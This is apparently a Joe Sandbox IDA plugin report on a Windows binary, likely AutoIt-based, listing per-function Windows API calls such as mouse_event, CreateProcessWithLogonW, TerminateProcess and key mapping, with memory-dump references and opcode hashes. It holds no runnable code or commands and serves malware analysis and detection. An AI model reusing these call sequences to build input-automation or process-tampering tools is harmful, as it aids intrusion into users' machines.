                                                                            Similarity
                                                                            • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                            • String ID:
                                                                            • API String ID: 4137160315-0
                                                                            • Opcode ID: 93067ae57987e514657e5e9b9d0e36ccb609254a89355f890e89f80453bf2162
                                                                            • Instruction ID: 5bb82a271dc31ea5545e288c6247dfc7a21ddeca035f3c0e8eab8f3696845702
                                                                            • Opcode Fuzzy Hash: 93067ae57987e514657e5e9b9d0e36ccb609254a89355f890e89f80453bf2162
                                                                            • Instruction Fuzzy Hash: 8C31BC7210430AABD711DF14D849F9AB7EDFF89314F01091AF9859B191DA31EA088B92
                                                                            Function 0033AF64 Relevance: 9.1, APIs: 6, Instructions: 73processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0033AFAE
                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 0033AFB5
                                                                            • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 0033AFC4
                                                                            • CloseHandle.KERNEL32(00000004), ref: 0033AFCF
                                                                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0033AFFE
                                                                            • DestroyEnvironmentBlock.USERENV(00000000), ref: 0033B012
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                            • String ID:
                                                                            • API String ID: 1413079979-0
                                                                            • Opcode ID: b42ebf86d73a84a330b7cfba52e15c5627dd27ed22a5a36d81b74b1901335152
                                                                            • Instruction ID: 191a94f283fbe38e404343dceecdc587ec551ce62c02ce7fdaeb940ddab53355
                                                                            • Opcode Fuzzy Hash: b42ebf86d73a84a330b7cfba52e15c5627dd27ed22a5a36d81b74b1901335152
                                                                            • Instruction Fuzzy Hash: 9D217CB2104209ABCB038F94DD89FAE7BADAF44304F144055FA41A21A1C3768D21EB61
                                                                            Function 0036EBF6 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0031AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0031AFE3
                                                                              • Part of subcall function 0031AF83: SelectObject.GDI32(?,00000000), ref: 0031AFF2
                                                                              • Part of subcall function 0031AF83: BeginPath.GDI32(?), ref: 0031B009
                                                                              • Part of subcall function 0031AF83: SelectObject.GDI32(?,00000000), ref: 0031B033
                                                                            • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0036EC20
                                                                            • LineTo.GDI32(00000000,00000003,?), ref: 0036EC34
                                                                            • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0036EC42
                                                                            • LineTo.GDI32(00000000,00000000,?), ref: 0036EC52
                                                                            • EndPath.GDI32(00000000), ref: 0036EC62
                                                                            • StrokePath.GDI32(00000000), ref: 0036EC72
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                            • String ID:
                                                                            • API String ID: 43455801-0
                                                                            • Opcode ID: 605d72723c94919b24a5bcf0816a91d5ac50b9777922e5f1c11815ec2b597fc0
                                                                            • Instruction ID: dead0611d332557ab858e67008523a9d41f57d1c3b5ec96291407d858c28b2ea
                                                                            • Opcode Fuzzy Hash: 605d72723c94919b24a5bcf0816a91d5ac50b9777922e5f1c11815ec2b597fc0
                                                                            • Instruction Fuzzy Hash: 021109B6000249BFEF129F90DC88EEA7F6DEF08350F048152FE08991A1D7719D65DBA0
                                                                            Function 0033E19B Relevance: 9.0, APIs: 6, Instructions: 48COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDC.USER32(00000000), ref: 0033E1C0
                                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 0033E1D1
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0033E1D8
                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0033E1E0
                                                                            • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0033E1F7
                                                                            • MulDiv.KERNEL32(000009EC,?,?), ref: 0033E209
                                                                              • Part of subcall function 00339AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00339A05,00000000,00000000,?,00339DDB), ref: 0033A53A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: CapsDevice$ExceptionRaiseRelease
                                                                            • String ID:
                                                                            • API String ID: 603618608-0
                                                                            • Opcode ID: 613e24425f704ea109b29be3cbad1a7fcc6bf514b907f0ee829f744977220cc0
                                                                            • Instruction ID: fef3a3ba7ad6b8fdbfbd1d5c0a5246950dc69f363f59ea6676c6912c59caa2a2
                                                                            • Opcode Fuzzy Hash: 613e24425f704ea109b29be3cbad1a7fcc6bf514b907f0ee829f744977220cc0
                                                                            • Instruction Fuzzy Hash: F30171B5A00319BBEB119BA59C45B5ABFA8EB48351F004066EA04A72D0D6709C008B60
                                                                            Function 00327B47 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __init_pointers.LIBCMT ref: 00327B47
                                                                              • Part of subcall function 0032123A: __initp_misc_winsig.LIBCMT ref: 0032125E
                                                                              • Part of subcall function 0032123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00327F51
                                                                              • Part of subcall function 0032123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00327F65
                                                                              • Part of subcall function 0032123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00327F78
                                                                              • Part of subcall function 0032123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00327F8B
                                                                              • Part of subcall function 0032123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00327F9E
                                                                              • Part of subcall function 0032123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00327FB1
                                                                              • Part of subcall function 0032123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00327FC4
                                                                              • Part of subcall function 0032123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00327FD7
                                                                              • Part of subcall function 0032123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00327FEA
                                                                              • Part of subcall function 0032123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00327FFD
                                                                              • Part of subcall function 0032123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00328010
                                                                              • Part of subcall function 0032123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00328023
                                                                              • Part of subcall function 0032123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00328036
                                                                              • Part of subcall function 0032123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00328049
                                                                              • Part of subcall function 0032123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0032805C
                                                                              • Part of subcall function 0032123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0032806F
                                                                            • __mtinitlocks.LIBCMT ref: 00327B4C
                                                                              • Part of subcall function 00327E23: InitializeCriticalSectionAndSpinCount.KERNEL32(003BAC68,00000FA0,?,?,00327B51,00325E77,003B6C70,00000014), ref: 00327E41
                                                                            • __mtterm.LIBCMT ref: 00327B55
                                                                              • Part of subcall function 00327BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00327B5A,00325E77,003B6C70,00000014), ref: 00327D3F
                                                                              • Part of subcall function 00327BBD: _free.LIBCMT ref: 00327D46
                                                                              • Part of subcall function 00327BBD: DeleteCriticalSection.KERNEL32(003BAC68,?,?,00327B5A,00325E77,003B6C70,00000014), ref: 00327D68
                                                                            • __calloc_crt.LIBCMT ref: 00327B7A
                                                                            • GetCurrentThreadId.KERNEL32 ref: 00327BA3
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                            • String ID:
                                                                            • API String ID: 2942034483-0
                                                                            • Opcode ID: a634230f4416caf81eea4eb84bf1f1abd6ac459470c17f2aea20266fb2044f5f
                                                                            • Instruction ID: dd1f2d1cd1d3309a75bd41cb412e2c24aa4334e139264d636f329dc1bcb6815e
                                                                            • Opcode Fuzzy Hash: a634230f4416caf81eea4eb84bf1f1abd6ac459470c17f2aea20266fb2044f5f
                                                                            • Instruction Fuzzy Hash: ACF0903210D73219E62777757C4BA4A2AC4BF01734F220699F860CD1D2FF2188414170
                                                                            Function 003027EC Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0030281D
                                                                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 00302825
                                                                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00302830
                                                                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 0030283B
                                                                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 00302843
                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0030284B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Virtual
                                                                            • String ID:
                                                                            • API String ID: 4278518827-0
                                                                            • Opcode ID: a80b91acd22902c10ee425087d6c40b42d5894b7d4ab6f3b62af584bb4bd84c6
                                                                            • Instruction ID: eb1081e17794b1617f145c8023ca0308c86ace9826c72ef87733a3dcba3cbaec
                                                                            • Opcode Fuzzy Hash: a80b91acd22902c10ee425087d6c40b42d5894b7d4ab6f3b62af584bb4bd84c6
                                                                            • Instruction Fuzzy Hash: 02016CB0901B5D7DE3008F6A8C85B52FFA8FF15354F00415B915C47941C7F5A864CBE5
                                                                            Function 00349AD5 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                            • String ID:
                                                                            • API String ID: 1423608774-0
                                                                            • Opcode ID: 11a61955bf8341509f062ebf875951574cb51deed202b6e89cb14a96aaaf71de
                                                                            • Instruction ID: 85b8297978b84ac027514cb03004f177a6b6c1f1f69918f6e0368bddb043e57e
                                                                            • Opcode Fuzzy Hash: 11a61955bf8341509f062ebf875951574cb51deed202b6e89cb14a96aaaf71de
                                                                            • Instruction Fuzzy Hash: DF018136142311ABDB172B54EC48EEB77BEFF88711F0509AAF5039A1E0DB64E800DB50
                                                                            Function 00347BF7 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00347C07
                                                                            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00347C1D
                                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 00347C2C
                                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00347C3B
                                                                            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00347C45
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00347C4C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                            • String ID:
                                                                            • API String ID: 839392675-0
                                                                            • Opcode ID: 5904a18650ae574eeeb031b0ec9c547f4c01f7b49f683855e251a1050d4db13c
                                                                            • Instruction ID: 7aaddd74fcc4a8edf1ce29b9956ca64991af226b9313cd22ef81abd4e7758763
                                                                            • Opcode Fuzzy Hash: 5904a18650ae574eeeb031b0ec9c547f4c01f7b49f683855e251a1050d4db13c
                                                                            • Instruction Fuzzy Hash: EDF03A76241258BBE7225B529C0EEEF7BBCEFC6B21F000098FA01D1091E7A05E41C7B5
                                                                            Function 00349A20 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InterlockedExchange.KERNEL32(?,?), ref: 00349A33
                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,00375DEE,?,?,?,?,?,0030ED63), ref: 00349A44
                                                                            • TerminateThread.KERNEL32(?,000001F6,?,?,?,00375DEE,?,?,?,?,?,0030ED63), ref: 00349A51
                                                                            • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00375DEE,?,?,?,?,?,0030ED63), ref: 00349A5E
                                                                              • Part of subcall function 003493D1: CloseHandle.KERNEL32(?,?,00349A6B,?,?,?,00375DEE,?,?,?,?,?,0030ED63), ref: 003493DB
                                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 00349A71
                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,?,00375DEE,?,?,?,?,?,0030ED63), ref: 00349A78
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                            • String ID:
                                                                            • API String ID: 3495660284-0
                                                                            • Opcode ID: 8a9c4bbdf38cb772ba64e1bd0828fee4ec84553013b44bd4a7eab3bcb7a452e3
                                                                            • Instruction ID: d3d3a7ad0be30894422aa162805f49bb4df72efcdd4b19e2a97cdbd0b6ae9ba8
                                                                            • Opcode Fuzzy Hash: 8a9c4bbdf38cb772ba64e1bd0828fee4ec84553013b44bd4a7eab3bcb7a452e3
                                                                            • Instruction Fuzzy Hash: D6F05E36141311ABD7532BA4EC8DEAB777EFF85311F1508A6F503950E0DBB5A901DB50
                                                                            Function 00301CDE Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0031F4EA: std::exception::exception.LIBCMT ref: 0031F51E
                                                                              • Part of subcall function 0031F4EA: __CxxThrowException@8.LIBCMT ref: 0031F533
                                                                            • __swprintf.LIBCMT ref: 00301EA6
                                                                            Strings
                                                                            • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00301D49
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Exception@8Throw__swprintfstd::exception::exception
                                                                            • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                            • API String ID: 2125237772-557222456
                                                                            • Opcode ID: 38fd4b651ff7e0accfc99e59de1b1fe4d0229fe802b52b4fdfbedaff8eb9538a
                                                                            • Instruction ID: 5153e8293d99aebc7c88212859e5ccd6c81991705d7b4d61638db0148344b160
                                                                            • Opcode Fuzzy Hash: 38fd4b651ff7e0accfc99e59de1b1fe4d0229fe802b52b4fdfbedaff8eb9538a
                                                                            • Instruction Fuzzy Hash: 36917A711152019FC726EF25C8A6C6FB7E8AF85700F01492DF9899B2E1DB71EE04CB92
                                                                            Function 0035AFE0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VariantInit.OLEAUT32(?), ref: 0035B006
                                                                            • CharUpperBuffW.USER32(?,?), ref: 0035B115
                                                                            • VariantClear.OLEAUT32(?), ref: 0035B298
                                                                              • Part of subcall function 00349DC5: VariantInit.OLEAUT32(00000000), ref: 00349E05
                                                                              • Part of subcall function 00349DC5: VariantCopy.OLEAUT32(?,?), ref: 00349E0E
                                                                              • Part of subcall function 00349DC5: VariantClear.OLEAUT32(?), ref: 00349E1A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                            • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                            • API String ID: 4237274167-1221869570
                                                                            • Opcode ID: 2864da56ef35a27055418d095d620e73c1854c162cc2793a511e989928ac303d
                                                                            • Instruction ID: 635a5c19e433353a6e36e81d3d86b3b4e5eff93c1ee3a9734ae91b40a4f59ba4
                                                                            • Opcode Fuzzy Hash: 2864da56ef35a27055418d095d620e73c1854c162cc2793a511e989928ac303d
                                                                            • Instruction Fuzzy Hash: E8916C746083019FCB12DF24C491D5AF7F8AF89704F04496DF89A9B3A2DB31E949CB52
                                                                            Function 00345347 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0031C6F4: _wcscpy.LIBCMT ref: 0031C717
                                                                            • _memset.LIBCMT ref: 00345438
                                                                            • GetMenuItemInfoW.USER32(?), ref: 00345467
                                                                            • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00345513
                                                                            • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0034553D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                            • String ID: 0
                                                                            • API String ID: 4152858687-4108050209
                                                                            • Opcode ID: 2aaa6c6c48bea98bff0ebb2f24c33de7583f14ba3744bbcc73b9483af8469cb2
                                                                            • Instruction ID: 17d8f950e19f8d8b59aa671fc9c3ba5389f69d91eaa99e738d72b1977367796d
                                                                            • Opcode Fuzzy Hash: 2aaa6c6c48bea98bff0ebb2f24c33de7583f14ba3744bbcc73b9483af8469cb2
                                                                            • Instruction Fuzzy Hash: DD51F172A047019BD7179F28C841BBBB7E8AB86710F05062DF896DF2D3DB60ED448B52
                                                                            Function 00340213 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0034027B
                                                                            • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 003402B1
                                                                            • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 003402C2
                                                                            • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00340344
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$AddressCreateInstanceProc
                                                                            • String ID: DllGetClassObject
                                                                            • API String ID: 753597075-1075368562
                                                                            • Opcode ID: a4e5c673b6ebb75424744263c5222d63fa296b72657af13013dd31ba09bab3f4
                                                                            • Instruction ID: c10c5cf3aa068c1170b7f271ebb9c8d4c77c93d5358357238f917bb3f0336d3e
                                                                            • Opcode Fuzzy Hash: a4e5c673b6ebb75424744263c5222d63fa296b72657af13013dd31ba09bab3f4
                                                                            • Instruction Fuzzy Hash: C8415C75600204EFDB4ADF64C884B9A7BF9EF44314F1580A9EE09DF246D7B1E944CBA0
                                                                            Function 00345007 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 00345075
                                                                            • GetMenuItemInfoW.USER32 ref: 00345091
                                                                            • DeleteMenu.USER32(00000004,00000007,00000000), ref: 003450D7
                                                                            • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,003C1708,00000000), ref: 00345120
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
